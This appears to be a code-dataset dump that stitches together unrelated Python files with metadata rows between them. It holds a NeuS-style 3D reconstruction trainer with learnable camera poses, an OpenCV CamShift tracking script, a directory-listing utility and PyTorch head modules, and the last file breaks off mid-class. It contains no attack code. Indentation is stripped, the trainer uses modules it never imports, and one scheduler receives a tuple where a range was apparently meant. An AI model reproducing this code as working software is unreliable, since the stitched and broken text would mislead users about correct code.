import torch
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
from shutil import copyfile
from icecream import ic
from tqdm import tqdm
from pyhocon import ConfigFactory
from models.dataset import Dataset, load_K_Rt_from_P
from models.fields import RenderingNetwork, SDFNetwork, SingleVarianceNetwork, NeRF
from models.renderer import NeuSRenderer
from models.poses import LearnPose, LearnIntrin, RaysGenerator
# from models.depth import SiLogLoss
class Runner:
def __init__(self, conf_path, mode='train', case='CASE_NAME', is_continue=False):
self.device = torch.device('cuda')
# Configuration
self.conf_path = conf_path
f = open(self.conf_path)
conf_text = f.read()
conf_text = conf_text.replace('CASE_NAME', case)
f.close()
self.conf = ConfigFactory.parse_string(conf_text)
self.conf['dataset.data_dir'] = self.conf['dataset.data_dir'].replace('CASE_NAME', case)
self.base_exp_dir = self.conf['general.base_exp_dir']
os.makedirs(self.base_exp_dir, exist_ok=True)
self.dataset = Dataset(self.conf['dataset'])
self.iter_step = 0
self.poses_iter_step = 0
# Training parameters
self.end_iter = self.conf.get_int('train.end_iter')
self.save_freq = self.conf.get_int('train.save_freq')
self.report_freq = self.conf.get_int('train.report_freq')
self.val_freq = self.conf.get_int('train.val_freq')
self.val_mesh_freq = self.conf.get_int('train.val_mesh_freq')
self.batch_size = self.conf.get_int('train.batch_size')
self.validate_resolution_level = self.conf.get_int('train.validate_resolution_level')
self.learning_rate = self.conf.get_float('train.learning_rate')
self.learning_rate_alpha = self.conf.get_float('train.learning_rate_alpha')
self.use_white_bkgd = self.conf.get_bool('train.use_white_bkgd')
self.warm_up_end = self.conf.get_int('train.warm_up_end', default=0.0)
self.anneal_end = self.conf.get_int('train.anneal_end', default=0.0)
self.extract_depth = self.conf.get_bool('train.extract_depth')
self.learnable = self.conf.get_bool('train.focal_learnable')
if self.learnable:
self.focal_lr = self.conf.get_float('train.focal_lr')
self.pose_lr = self.conf.get_float('train.pose_lr')
self.focal_lr_gamma = self.conf.get_float('train.focal_lr_gamma')
self.pose_lr_gamma = self.conf.get_float('train.pose_lr_gamma')
self.step_size = self.conf.get_int('train.step_size')
self.start_refine_pose_iter = self.conf.get_int('train.start_refine_pose_iter')
self.start_refine_focal_iter = self.conf.get_int('train.start_refine_focal_iter')
# learn focal parameter
self.intrin_net = LearnIntrin(self.dataset.H, self.dataset.W, **self.conf['model.focal'], init_focal=self.dataset.focal).to(self.device)
# learn pose for each image
self.pose_param_net = LearnPose(self.dataset.n_images, **self.conf['model.pose'], init_c2w=self.dataset.pose_all).to(self.device)
self.optimizer_focal = torch.optim.Adam(self.intrin_net.parameters(), lr=self.focal_lr)
self.optimizer_pose = torch.optim.Adam(self.pose_param_net.parameters(), lr=self.pose_lr)
self.scheduler_focal = torch.optim.lr_scheduler.MultiStepLR(self.optimizer_focal, milestones=(self.warm_up_end, self.end_iter, self.step_size),
gamma=self.focal_lr_gamma)
self.scheduler_pose = torch.optim.lr_scheduler.MultiStepLR(self.optimizer_pose, milestones=range(self.warm_up_end, self.end_iter, self.step_size),
gamma=self.pose_lr_gamma)
else:
self.intrin_net = self.dataset.intrinsics_all
self.pose_param_net = self.dataset.pose_all
self.rays_generator = RaysGenerator(self.dataset.images_lis, self.dataset.masks_lis, self.dataset.depth_lis, self.pose_param_net, self.intrin_net, learnable=self.learnable)
# Weights
self.igr_weight = self.conf.get_float('train.igr_weight')
self.mask_weight = self.conf.get_float('train.mask_weight')
self.is_continue = is_continue
self.mode = mode
self.model_list = []
self.writer = None
# Networks
params_to_train = []
self.nerf_outside = NeRF(**self.conf['model.nerf']).to(self.device)
self.sdf_network = SDFNetwork(**self.conf['model.sdf_network']).to(self.device)
self.deviation_network = SingleVarianceNetwork(**self.conf['model.variance_network']).to(self.device)
self.color_network = RenderingNetwork(**self.conf['model.rendering_network']).to(self.device)
params_to_train += list(self.nerf_outside.parameters())
params_to_train += list(self.sdf_network.parameters())
params_to_train += list(self.deviation_network.parameters())
params_to_train += list(self.color_network.parameters())
if self.extract_depth:
# add depth_feats+
self.depth_weight = self.conf.get_float('train.depth_weight')
self.depth_network = RenderingNetwork(**self.conf['model.depth_extract_network']).to(self.device)
# self.d_loss = SiLogLoss()
params_to_train += list(self.depth_network.parameters())
else:
self.depth_network = None
self.renderer = NeuSRenderer(self.nerf_outside,
self.sdf_network,
self.deviation_network,
self.color_network,
self.depth_network,
**self.conf['model.neus_renderer'])
self.optimizer = torch.optim.Adam(params_to_train, lr=self.learning_rate)
# Load checkpoint
latest_model_name = None
if is_continue:
model_list_raw = os.listdir(os.path.join(self.base_exp_dir, 'checkpoints'))
model_list = []
for model_name in model_list_raw:
if model_name[-3:] == 'pth' and int(model_name[5:-4]) <= self.end_iter:
model_list.append(model_name)
model_list.sort()
latest_model_name = model_list[-1]
if latest_model_name is not None:
logging.info('Find checkpoint: {}'.format(latest_model_name))
self.load_checkpoint(latest_model_name)
# Backup codes and configs for debug
if self.mode[:5] == 'train':
self.file_backup()
def train(self):
self.writer = SummaryWriter(log_dir=os.path.join(self.base_exp_dir, 'logs'))
self.update_learning_rate()
res_step = self.end_iter - self.iter_step
image_perm = self.get_image_perm()
if self.learnable:
if self.poses_iter_step >= self.start_refine_pose_iter:
self.pose_param_net.train()
else:
self.pose_param_net.eval()
if self.poses_iter_step >= self.start_refine_focal_iter:
self.intrin_net.train()
else:
self.intrin_net.eval()
for iter_i in tqdm(range(res_step)):
if self.learnable:
if self.poses_iter_step >= self.start_refine_pose_iter:
self.pose_param_net.train()
if self.poses_iter_step >= self.start_refine_focal_iter:
self.intrin_net.train()
img_idx = image_perm[self.iter_step % len(image_perm)]
# data = self.dataset.gen_random_rays_at(image_perm[self.iter_step % len(image_perm)], self.batch_size)
data = self.rays_generator.gen_random_rays_at(img_idx, self.batch_size)
rays_o, rays_d, true_rgb, mask, gt_feats = data[:, :3], data[:, 3: 6], data[:, 6: 9], data[:, 9: 10], data[:, 10:]
near, far = self.dataset.near_far_from_sphere(rays_o, rays_d)
background_rgb = None
if self.use_white_bkgd:
background_rgb = torch.ones([1, 3])
if self.mask_weight > 0.0:
mask = (mask > 0.5).float()
else:
mask = torch.ones_like(mask)
mask_sum = mask.sum() + 1e-5
render_out = self.renderer.render(rays_o, rays_d, near, far,
background_rgb=background_rgb,
cos_anneal_ratio=self.get_cos_anneal_ratio())
depth_feats = render_out['render_feats']
color_fine = render_out['color_fine']
s_val = render_out['s_val']
cdf_fine = render_out['cdf_fine']
gradient_error = render_out['gradient_error']
weight_max = render_out['weight_max']
weight_sum = render_out['weight_sum']
# Loss
color_error = (color_fine - true_rgb) * mask
color_fine_loss = F.l1_loss(color_error, torch.zeros_like(color_error), reduction='sum') / mask_sum
psnr = 20.0 * torch.log10(1.0 / (((color_fine - true_rgb)**2 * mask).sum() / (mask_sum * 3.0)).sqrt())
eikonal_loss = gradient_error
mask_loss = F.binary_cross_entropy(weight_sum.clip(1e-3, 1.0 - 1e-3), mask)
loss = color_fine_loss +\
eikonal_loss * self.igr_weight +\
mask_loss * self.mask_weight
if self.extract_depth:
# print(gt_feats.shape)
# depth_loss = self.d_loss(torch.sigmoid(depth_feats), gt_feats)
# depth_fine_loss = F.l1_loss(depth_loss, torch.zeros_like(depth_loss), reduction='sum') / mask_sum
# loss += depth_loss
# self.writer.add_scalar('Loss/depth_loss', depth_loss, self.iter_step)
depth_feat_error = (depth_feats - gt_feats) * mask
depth_fine_loss = F.l1_loss(depth_feat_error, torch.zeros_like(depth_feat_error), reduction='sum') / mask_sum
psnr_dfeat = 20.0 * torch.log10(1.0 / (((depth_feats - gt_feats)**2 * mask).sum() / (mask_sum * 3.0)).sqrt())
loss += depth_fine_loss * self.depth_weight
self.writer.add_scalar('Loss/depth_loss', depth_fine_loss, self.iter_step)
self.writer.add_scalar('Statistics/psnr_dfeat', psnr_dfeat, self.iter_step)
# print(depth_loss)
# print(loss)
self.optimizer.zero_grad()
if self.learnable:
self.optimizer_focal.zero_grad()
self.optimizer_pose.zero_grad()
loss.backward()
self.optimizer.step()
if self.learnable:
self.optimizer_focal.step()
self.optimizer_pose.step()
self.iter_step += 1
self.poses_iter_step += 1
self.writer.add_scalar('Loss/loss', loss, self.iter_step)
self.writer.add_scalar('Loss/color_loss', color_fine_loss, self.iter_step)
self.writer.add_scalar('Loss/eikonal_loss', eikonal_loss, self.iter_step)
self.writer.add_scalar('Statistics/s_val', s_val.mean(), self.iter_step)
self.writer.add_scalar('Statistics/cdf', (cdf_fine[:, :1] * mask).sum() / mask_sum, self.iter_step)
self.writer.add_scalar('Statistics/weight_max', (weight_max * mask).sum() / mask_sum, self.iter_step)
self.writer.add_scalar('Statistics/psnr', psnr, self.iter_step)
if self.iter_step % self.report_freq == 0:
print(self.base_exp_dir)
print('iter:{:8>d} loss = {} lr={}'.format(self.iter_step, loss, self.optimizer.param_groups[0]['lr']))
if self.iter_step % self.save_freq == 0:
self.save_checkpoint()
# pose_history_milestone = list(range(0, 100, 5)) + list(range(100, 1000, 100)) + list(range(1000, 10000, 1000))
# if self.poses_iter_step in pose_history_milestone:
# self.save_pnf_checkpoint()
if self.iter_step % self.val_freq == 0:
self.validate_image()
if self.iter_step % self.val_mesh_freq == 0:
res = 128
if self.iter_step % 10000==0:
res = 256
self.validate_mesh(resolution=res)
self.update_learning_rate()
if self.iter_step % len(image_perm) == 0:
image_perm = self.get_image_perm()
def get_image_perm(self):
return torch.randperm(self.dataset.n_images)
def get_cos_anneal_ratio(self):
if self.anneal_end == 0.0:
return 1.0
else:
return np.min([1.0, self.iter_step / self.anneal_end])
def update_learning_rate(self):
if self.iter_step < self.warm_up_end:
learning_factor = self.iter_step / self.warm_up_end
else:
alpha = self.learning_rate_alpha
progress = (self.iter_step - self.warm_up_end) / (self.end_iter - self.warm_up_end)
learning_factor = (np.cos(np.pi * progress) + 1.0) * 0.5 * (1 - alpha) + alpha
for g in self.optimizer.param_groups:
g['lr'] = self.learning_rate * learning_factor
if self.learnable:
self.scheduler_focal.step()
self.scheduler_pose.step()
def file_backup(self):
dir_lis = self.conf['general.recording']
os.makedirs(os.path.join(self.base_exp_dir, 'recording'), exist_ok=True)
for dir_name in dir_lis:
cur_dir = os.path.join(self.base_exp_dir, 'recording', dir_name)
os.makedirs(cur_dir, exist_ok=True)
files = os.listdir(dir_name)
for f_name in files:
if f_name[-3:] == '.py':
copyfile(os.path.join(dir_name, f_name), os.path.join(cur_dir, f_name))
copyfile(self.conf_path, os.path.join(self.base_exp_dir, 'recording', 'config.conf'))
def load_checkpoint(self, checkpoint_name):
checkpoint = torch.load(os.path.join(self.base_exp_dir, 'checkpoints', checkpoint_name), map_location=self.device)
self.nerf_outside.load_state_dict(checkpoint['nerf'])
self.sdf_network.load_state_dict(checkpoint['sdf_network_fine'])
self.deviation_network.load_state_dict(checkpoint['variance_network_fine'])
self.color_network.load_state_dict(checkpoint['color_network_fine'])
self.optimizer.load_state_dict(checkpoint['optimizer'])
self.iter_step = checkpoint['iter_step']
if self.learnable:
self.load_pnf_checkpoint(checkpoint_name.replace('ckpt', 'pnf'))
logging.info('End')
def save_checkpoint(self):
checkpoint = {
'nerf': self.nerf_outside.state_dict(),
'sdf_network_fine': self.sdf_network.state_dict(),
'variance_network_fine': self.deviation_network.state_dict(),
'color_network_fine': self.color_network.state_dict(),
'depth_network_fine': self.depth_network.state_dict(),
'optimizer': self.optimizer.state_dict(),
'iter_step': self.iter_step,
}
os.makedirs(os.path.join(self.base_exp_dir, 'checkpoints'), exist_ok=True)
torch.save(checkpoint, os.path.join(self.base_exp_dir, 'checkpoints', 'ckpt_{:0>6d}.pth'.format(self.iter_step)))
if self.learnable:
self.save_pnf_checkpoint()
def load_pnf_checkpoint(self, checkpoint_name):
checkpoint = torch.load(os.path.join(self.base_exp_dir, 'pnf_checkpoints', checkpoint_name), map_location=self.device)
self.intrin_net.load_state_dict(checkpoint['intrin_net'])
self.pose_param_net.load_state_dict(checkpoint['pose_param_net'])
self.optimizer_focal.load_state_dict(checkpoint['optimizer_focal'])
self.optimizer_pose.load_state_dict(checkpoint['optimizer_pose'])
self.poses_iter_step = checkpoint['poses_iter_step']
def save_pnf_checkpoint(self):
pnf_checkpoint = {
'intrin_net': self.intrin_net.state_dict(),
'pose_param_net': self.pose_param_net.state_dict(),
'optimizer_focal': self.optimizer_focal.state_dict(),
'optimizer_pose': self.optimizer_pose.state_dict(),
'poses_iter_step': self.poses_iter_step,
}
os.makedirs(os.path.join(self.base_exp_dir, 'pnf_checkpoints'), exist_ok=True)
torch.save(pnf_checkpoint, os.path.join(self.base_exp_dir, 'pnf_checkpoints', 'pnf_{:0>6d}.pth'.format(self.iter_step)))
def store_current_pose(self):
self.pose_net.eval()
num_cams = self.pose_net.module.num_cams if isinstance(self.pose_net, torch.nn.DataParallel) else self.pose_net.num_cams
c2w_list = []
for i in range(num_cams):
c2w = self.pose_net(i) # (4, 4)
c2w_list.append(c2w)
c2w_list = torch.stack(c2w_list) # (N, 4, 4)
c2w_list = c2w_list.detach().cpu().numpy()
np.save(os.path.join(self.base_exp_dir, 'cam_poses', 'pose_{:0>6d}.npy'.format(self.iter_step)), c2w_list)
return
def validate_image(self, idx=-1, resolution_level=-1):
if idx < 0:
idx = np.random.randint(self.dataset.n_images)
print('Validate: iter: {}, camera: {}'.format(self.iter_step, idx))
if resolution_level < 0:
resolution_level = self.validate_resolution_level
# rays_o, rays_d = self.dataset.gen_rays_at(idx, resolution_level=resolution_level)
rays_o, rays_d = self.rays_generator.gen_rays_at(idx, resolution_level=resolution_level)
H, W, _ = rays_o.shape
rays_o = rays_o.reshape(-1, 3).split(self.batch_size)
rays_d = rays_d.reshape(-1, 3).split(self.batch_size)
out_rgb_fine = []
out_normal_fine = []
for rays_o_batch, rays_d_batch in zip(rays_o, rays_d):
near, far = self.dataset.near_far_from_sphere(rays_o_batch, rays_d_batch)
background_rgb = torch.ones([1, 3]) if self.use_white_bkgd else None
render_out = self.renderer.render(rays_o_batch,
rays_d_batch,
near,
far,
cos_anneal_ratio=self.get_cos_anneal_ratio(),
background_rgb=background_rgb)
def feasible(key): return (key in render_out) and (render_out[key] is not None)
if feasible('color_fine'):
out_rgb_fine.append(render_out['color_fine'].detach().cpu().numpy())
if feasible('gradients') and feasible('weights'):
n_samples = self.renderer.n_samples + self.renderer.n_importance
normals = render_out['gradients'] * render_out['weights'][:, :n_samples, None]
if feasible('inside_sphere'):
normals = normals * render_out['inside_sphere'][..., None]
normals = normals.sum(dim=1).detach().cpu().numpy()
out_normal_fine.append(normals)
del render_out
img_fine = None
if len(out_rgb_fine) > 0:
img_fine = (np.concatenate(out_rgb_fine, axis=0).reshape([H, W, 3, -1]) * 256).clip(0, 255)
normal_img = None
if len(out_normal_fine) > 0:
normal_img = np.concatenate(out_normal_fine, axis=0)
rot = np.linalg.inv(self.dataset.pose_all[idx, :3, :3].detach().cpu().numpy())
normal_img = (np.matmul(rot[None, :, :], normal_img[:, :, None])
.reshape([H, W, 3, -1]) * 128 + 128).clip(0, 255)
os.makedirs(os.path.join(self.base_exp_dir, 'validations_fine'), exist_ok=True)
os.makedirs(os.path.join(self.base_exp_dir, 'normals'), exist_ok=True)
for i in range(img_fine.shape[-1]):
if len(out_rgb_fine) > 0:
cv.imwrite(os.path.join(self.base_exp_dir,
'validations_fine',
'{:0>8d}_{}_{}.png'.format(self.iter_step, i, idx)),
np.concatenate([img_fine[..., i],
self.rays_generator.image_at(idx, resolution_level=resolution_level)]))
# self.dataset.image_at(idx, resolution_level=resolution_level)]))
if len(out_normal_fine) > 0:
cv.imwrite(os.path.join(self.base_exp_dir,
'normals',
'{:0>8d}_{}_{}.png'.format(self.iter_step, i, idx)),
normal_img[..., i])
def render_novel_image(self, idx_0, idx_1, ratio, resolution_level):
"""
Interpolate view between two cameras.
"""
# rays_o, rays_d = self.dataset.gen_rays_between(idx_0, idx_1, ratio, resolution_level=resolution_level)
rays_o, rays_d = self.rays_generator.gen_rays_between(idx_0, idx_1, ratio, resolution_level=resolution_level)
H, W, _ = rays_o.shape
rays_o = rays_o.reshape(-1, 3).split(self.batch_size)
rays_d = rays_d.reshape(-1, 3).split(self.batch_size)
out_rgb_fine = []
for rays_o_batch, rays_d_batch in zip(rays_o, rays_d):
near, far = self.dataset.near_far_from_sphere(rays_o_batch, rays_d_batch)
background_rgb = torch.ones([1, 3]) if self.use_white_bkgd else None
render_out = self.renderer.render(rays_o_batch,
rays_d_batch,
near,
far,
cos_anneal_ratio=self.get_cos_anneal_ratio(),
background_rgb=background_rgb)
out_rgb_fine.append(render_out['color_fine'].detach().cpu().numpy())
del render_out
img_fine = (np.concatenate(out_rgb_fine, axis=0).reshape([H, W, 3]) * 256).clip(0, 255).astype(np.uint8)
return img_fine
def get_gt_poses(self, cameras_sphere, cam_num, color=None, length=0.5):
from vis_cam_traj import draw_camera_frustum_geometry
if color is None:
color = np.random.rand(1, 3)
camera_dict = np.load(cameras_sphere)
intrinsics_all = []
pose_all = []
for idx in range(cam_num):
scale_mat = camera_dict['scale_mat_%d' % idx].astype(np.float32)
world_mat = camera_dict['world_mat_%d' % idx].astype(np.float32)
P = world_mat @ scale_mat
P = P[:3, :4]
intrinsics, pose = load_K_Rt_from_P(None, P)
intrinsics_all.append(intrinsics.astype(np.float32))
pose_all.append(pose.astype(np.float32))
c2w_gt = np.array(pose_all)
fx_gt = intrinsics_all[0][0, 0]
gt_color = np.array([color], dtype=np.float32)
gt_color = np.tile(gt_color, (cam_num, 1))
gt_est_list = draw_camera_frustum_geometry(c2w_gt, self.dataset.H, self.dataset.W,
fx_gt, fx_gt,
length, gt_color)
return gt_est_list
def show_cam_pose(self, iter_show=-1, random_color=True):
import open3d as o3d
from vis_cam_traj import draw_camera_frustum_geometry
cam_num = 33
# cam_num = self.dataset.n_images
'''Get focal'''
fxfy = self.intrin_net(0).cpu().detach().numpy()[0][0]
print('learned cam intrinsics:')
print('fxfy', fxfy)
'''Get all poses in (N, 4, 4)'''
c2ws_est = torch.stack([self.pose_param_net(i) for i in range(cam_num)]) # (N, 4, 4)
'''Frustum properties'''
frustum_length = 0.5
random_color = random_color
all_color = np.random.rand(3, 3)
if random_color:
frustum_color = np.random.rand(cam_num, 3)
else:
# frustum_color = np.array([[249, 65, 68]], dtype=np.float32) / 255
frustum_color = np.array([all_color[0]], dtype=np.float32)
frustum_color = np.tile(frustum_color, (cam_num, 1))
'''Get frustums'''
frustum_est_list = draw_camera_frustum_geometry(c2ws_est.cpu().detach().cpu().numpy(), self.dataset.H, self.dataset.W,
fxfy, fxfy,
frustum_length, frustum_color)
# init poses
c2w_init = self.dataset.pose_all
fx_init = self.dataset.focal.cpu().detach()
init_color = np.array([all_color[1]], dtype=np.float32)
init_color = np.tile(init_color, (cam_num, 1))
init_est_list = draw_camera_frustum_geometry(c2w_init.cpu().detach().cpu().numpy(), self.dataset.H, self.dataset.W,
fx_init, fx_init,
frustum_length, init_color)
# gt poses
gt_est_list = self.get_gt_poses(os.path.join('./exp/teeth_noise', 'cameras_sphere.npz'), cam_num, color=all_color[2], length=frustum_length)
geometry_to_draw = []
geometry_to_draw.append(frustum_est_list)
geometry_to_draw.append(init_est_list)
geometry_to_draw.append(gt_est_list)
# mesh
mesh = o3d.io.read_triangle_mesh(os.path.join(self.base_exp_dir, 'meshes', '{:0>8d}.ply'.format(iter_show)))
mesh.compute_vertex_normals()
geometry_to_draw.append(mesh)
o3d.visualization.draw_geometries(geometry_to_draw)
def validate_mesh(self, world_space=False, resolution=256, threshold=0.0):
bound_min = torch.tensor(self.dataset.object_bbox_min, dtype=torch.float32)
bound_max = torch.tensor(self.dataset.object_bbox_max, dtype=torch.float32)
vertices, triangles =\
self.renderer.extract_geometry(bound_min, bound_max, resolution=resolution, threshold=threshold)
os.makedirs(os.path.join(self.base_exp_dir, 'meshes'), exist_ok=True)
if world_space:
vertices = vertices * self.dataset.scale_mats_np[0][0, 0] + self.dataset.scale_mats_np[0][:3, 3][None]
mesh = trimesh.Trimesh(vertices, triangles)
mesh.export(os.path.join(self.base_exp_dir, 'meshes', '{:0>8d}.ply'.format(self.iter_step)))
logging.info('End')
def interpolate_view(self, img_idx_0, img_idx_1):
images = []
n_frames = 60
for i in range(n_frames):
print(i)
images.append(self.render_novel_image(img_idx_0,
img_idx_1,
np.sin(((i / n_frames) - 0.5) * np.pi) * 0.5 + 0.5,
resolution_level=4))
for i in range(n_frames):
images.append(images[n_frames - i - 1])
fourcc = cv.VideoWriter_fourcc(*'mp4v')
video_dir = os.path.join(self.base_exp_dir, 'render')
os.makedirs(video_dir, exist_ok=True)
h, w, _ = images[0].shape
writer = cv.VideoWriter(os.path.join(video_dir,
'{:0>8d}_{}_{}.mp4'.format(self.iter_step, img_idx_0, img_idx_1)),
fourcc, 30, (w, h))
for image in images:
writer.write(image)
writer.release()
if __name__ == '__main__':
print('Hello Wooden')
torch.set_default_tensor_type('torch.cuda.FloatTensor')
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
parser = argparse.ArgumentParser()
parser.add_argument('--conf', type=str, default='./confs/base.conf')
parser.add_argument('--mode', type=str, default='train')
parser.add_argument('--mcube_threshold', type=float, default=0.0)
parser.add_argument('--is_continue', default=False, action="store_true")
parser.add_argument('--gpu', type=int, default=0)
parser.add_argument('--case', type=str, default='')
args = parser.parse_args()
torch.cuda.set_device(args.gpu)
runner = Runner(args.conf, args.mode, args.case, args.is_continue)
if args.mode == 'train':
runner.train()
elif args.mode == 'validate_mesh':
runner.validate_mesh(world_space=True, resolution=512, threshold=args.mcube_threshold)
elif args.mode.startswith('interpolate'): # Interpolate views given two image indices
_, img_idx_0, img_idx_1 = args.mode.split('_')
img_idx_0 = int(img_idx_0)
img_idx_1 = int(img_idx_1)
runner.interpolate_view(img_idx_0, img_idx_1)
elif args.mode.startswith('showcam'):
_, iter_show = args.mode.split('_')
runner.load_pnf_checkpoint(('pnf_{:0>6d}.pth').format(int(iter_show)))
runner.show_cam_pose(int(iter_show))
| 47.590615
| 180
| 0.605352
| 3,826
| 29,411
| 4.356769
| 0.108207
| 0.023517
| 0.025916
| 0.019317
| 0.401344
| 0.328274
| 0.258624
| 0.207931
| 0.160837
| 0.127122
| 0
| 0.015732
| 0.278161
| 29,411
| 617
| 181
| 47.667747
| 0.76943
| 0.044643
| 0
| 0.156118
| 0
| 0
| 0.074344
| 0.012021
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0
| 0.046414
| 0.004219
| 0.099156
| 0.014768
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e44b7345e9261d66e37f31753ad1afb6577bc5f
| 2,007
|
py
|
Python
|
code/video-analiz/python/camshift.py
|
BASARIRR/computer-vision-guide
|
0a11726fb2be0cad63738ab45fd4edc4515441d2
|
[
"MIT"
] | 230
|
2019-01-17T01:00:53.000Z
|
2022-03-31T18:00:09.000Z
|
code/video-analiz/python/camshift.py
|
sturlu/goruntu-isleme-kilavuzu
|
e9377ace3823ca5f2d06ca78a11884256539134d
|
[
"MIT"
] | 8
|
2019-05-03T07:44:50.000Z
|
2022-02-10T00:14:38.000Z
|
code/video-analiz/python/camshift.py
|
sturlu/goruntu-isleme-kilavuzu
|
e9377ace3823ca5f2d06ca78a11884256539134d
|
[
"MIT"
] | 71
|
2019-01-17T12:11:06.000Z
|
2022-03-03T22:02:46.000Z
|
#Python v3, OpenCV v3.4.2
import numpy as np
import cv2
videoCapture = cv2.VideoCapture("video.mp4")
ret,camera_input = videoCapture.read()
rows, cols = camera_input.shape[:2]
'''
Video dosyası üzerine Mean Shift için bir alan belirlenir.
Bu koordinatlar ağırlıklı ortalaması belirlenecek olan dörtgen alanıdır. '''
#w ve h boyutlandırmasını değiştirerek sonuçları gözlemleyebilirsiniz
w = 10
h = 15
col = int((cols - w) / 2)
row = int((rows - h) / 2)
shiftWindow = (col, row, w, h)
'''
Şimdi görüntü üzerindeki parlaklığı, renk dağılımlarını dengelemek için bir maskeleme alanı oluşturalım ve
bu alan üzerinde histogram eşitleme yapalım
'''
roi = camera_input[row:row + h, col:col + w]
hsv_roi = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_roi, np.array((0., 60.,32.)), np.array((180.,255.,255.)))
histogram = cv2.calcHist([hsv_roi],[0],mask,[180],[0,180])
cv2.normalize(histogram,histogram,0,255,cv2.NORM_MINMAX)
'''
Bu parametre / durdurma ölçütü algoritmanın kendi içerisinde kaydırma/hesaplama işlemini kaç defa yapacağını belirlemektedir.
'''
term_crit = ( cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 1 )
while True:
#Video'dan bir frame okunur
ret ,camera_input = videoCapture.read()
'''
video içerisinde öncelikli HSV renk uzayı üzerinde histogram alıp histogram back projection yapacağız ve
tüm görüntü üzerinde istediğimiz yerin segmentlerini bulacağız.
'''
hsv = cv2.cvtColor(camera_input, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([hsv],[0],histogram,[0,180],1)
#her yeni konum için meanshift tekrar uygulanır
ret, shiftWindow = cv2.CamShift(dst, shiftWindow, term_crit)
#Görüntü üzerinde tespit edilen alanı çizelim
pts = cv2.boxPoints(ret)
pts = np.int0(pts)
result_image = cv2.polylines(camera_input,[pts],True, 255,2)
cv2.imshow('Camshift (Surekli Mean Shift) Algoritmasi', result_image)
k = cv2.waitKey(60) & 0xff
videoCapture.release()
cv2.destroyAllWindows()
| 32.901639
| 125
| 0.727454
| 274
| 2,007
| 5.255474
| 0.514599
| 0.045833
| 0.019444
| 0.036111
| 0.041667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045131
| 0.160937
| 2,007
| 61
| 126
| 32.901639
| 0.809976
| 0.103637
| 0
| 0.071429
| 0
| 0
| 0.042662
| 0
| 0
| 0
| 0.003413
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e459ba91afb3134b739b9c40e6c311ac98e5335
| 346
|
py
|
Python
|
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
DTT_files/dtt.py
|
stecik/Directory_to_text
|
f93c76f820ff7dc39e213779115861e53ed6a266
|
[
"MIT"
] | null | null | null |
from dtt_class import DTT
from parser import args
if __name__ == "__main__":
dtt = DTT()
# Creates a list of files and subdirectories
try:
l = dtt.dir_to_list(args.directory, args)
# Creates a .txt file with the list
dtt.list_to_txt(args.output_file, l)
except Exception as e:
print(f"Error: {e}")
| 28.833333
| 49
| 0.644509
| 53
| 346
| 3.943396
| 0.622642
| 0.076555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.265896
| 346
| 12
| 50
| 28.833333
| 0.822835
| 0.219653
| 0
| 0
| 0
| 0
| 0.067164
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9e45b73d08315aaa5770ad5f620934e0e80ebd70
| 1,675
|
py
|
Python
|
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
src/models/head.py
|
takedarts/DenseResNet
|
d5f9c143ed3c484436a2a5bac366c3795e5d47ec
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import collections
class BasicHead(nn.Sequential):
def __init__(self, in_channels, out_channels, **kwargs):
super().__init__()
class PreActHead(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
super().__init__(collections.OrderedDict(m for m in [
('norm', normalization(in_channels)),
('act', activation(inplace=True)),
] if m[1] is not None))
class MobileNetV2Head(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
super().__init__(collections.OrderedDict(m for m in [
('conv', nn.Conv2d(
in_channels, out_channels, kernel_size=1, padding=0, stride=1, bias=False)),
('norm', normalization(out_channels)),
('act', activation(inplace=True)),
] if m[1] is not None))
class MobileNetV3Head(nn.Sequential):
def __init__(self, in_channels, out_channels, normalization, activation, **kwargs):
channels = round(out_channels * 0.75)
super().__init__(collections.OrderedDict(m for m in [
('conv1', nn.Conv2d(
in_channels, channels, kernel_size=1, padding=0, stride=1, bias=False)),
('norm1', normalization(channels)),
('act1', activation(inplace=True)),
('pool', nn.AdaptiveAvgPool2d(1)),
('conv2', nn.Conv2d(
channels, out_channels, kernel_size=1, padding=0, stride=1, bias=True)),
